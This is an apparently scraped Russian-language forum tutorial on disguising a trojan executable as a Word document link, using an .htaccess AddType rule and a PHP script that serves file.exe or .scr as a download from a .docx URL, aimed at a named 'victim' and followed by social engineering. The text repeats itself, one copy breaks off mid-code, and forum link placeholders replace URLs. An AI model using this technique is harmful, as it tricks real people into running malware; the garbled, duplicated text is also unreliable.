доброго времени суток
сегодня рассмотрим как можно подменить расширение типа файла
для чего может быть использовано?
например вы хотите заслать трой определённому юзеру а exe будет подозрительно
тогда это специально для вас
обьясню коротко у вас на серваке находится файл с названием file.exe
который должна скачать наша жертва кидать ссылку ввиде domain/file.exe
немного создаст палево тоисть 100%ного пробива небудет
а ссылка domain/file.docx или domain/name.doc практически по факту не вызовет подозрени
и при переходе на domain/file.docx будет скачиваться ваш заданный файл
после того как прочитаете статью до конца то вы сможете создавать свои ссылки такого рода
перейдём к практике
1.Открываем блокнот и пишем
AddType application/x-httpd-php .doc .docx
сохраним это как .htaccess затем заливаем на хостинг/сервер в корень или ту папку где будет
находится наш exe файл в моем случае это корень сайта
2.теперь нужно создать php скрипт с расширением .doc или .docx при обращении к котрому
выскочит предложение скачать наш файл
открываем блокнот пишем
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=имя файла’);
echo file_get_contents(‘путь к файлу’);
?>
Пример:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=file.exe‘);
echo file_get_contents(‘
?>
если же заливаете в корень то можно написать последнию строку и так
echo file_get_contents(‘file.exe‘);
Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.
Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.
Теперь даем жертве ссылку:
сегодня рассмотрим как можно подменить расширение типа файла
для чего может быть использовано?
например вы хотите заслать трой определённому юзеру а exe будет подозрительно
тогда это специально для вас
обьясню коротко у вас на серваке находится файл с названием file.exe
который должна скачать наша жертва кидать ссылку ввиде domain/file.exe
немного создаст палево тоисть 100%ного пробива небудет
а ссылка domain/file.docx или domain/name.doc практически по факту не вызовет подозрени
и при переходе на domain/file.docx будет скачиваться ваш заданный файл
после того как прочитаете статью до конца то вы сможете создавать свои ссылки такого рода
перейдём к практике
1.Открываем блокнот и пишем
AddType application/x-httpd-php .doc .docx
сохраним это как .htaccess затем заливаем на хостинг/сервер в корень или ту папку где будет
находится наш exe файл в моем случае это корень сайта
2.теперь нужно создать php скрипт с расширением .doc или .docx при обращении к котрому
выскочит предложение скачать наш файл
открываем блокнот пишем
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=имя файла’);
echo file_get_contents(‘путь к файлу’);
?>
Пример:
<?
header(‘Content-Type: application/octet-stream’);
header(‘Content-Disposition: attachment; filename=file.exe‘);
echo file_get_contents(‘
You must be registered for see links
?>
если же заливаете в корень то можно написать последнию строку и так
echo file_get_contents(‘file.exe‘);
Если exe сильно мозолит глаза, то можно изменить расширение с .exe на .scr (разницы нету), если делаете замену на .scr, то меняется путь к файлу, а точнее расширение.
Сохраняем данный скрипт под названием name.docx (name — ваше имя файла). Имя exe и имя скрипта должны совпадать. Заливаем на хостинг/сервер.
Теперь даем жертве ссылку:
You must be registered for see links
, он или она переходит и скачивает файл. Также можно ссылку скинуть в соц сети или другом месте , жертва посмотрит, что расширение docx и скорее всего скачает, а дальше используйте СИ.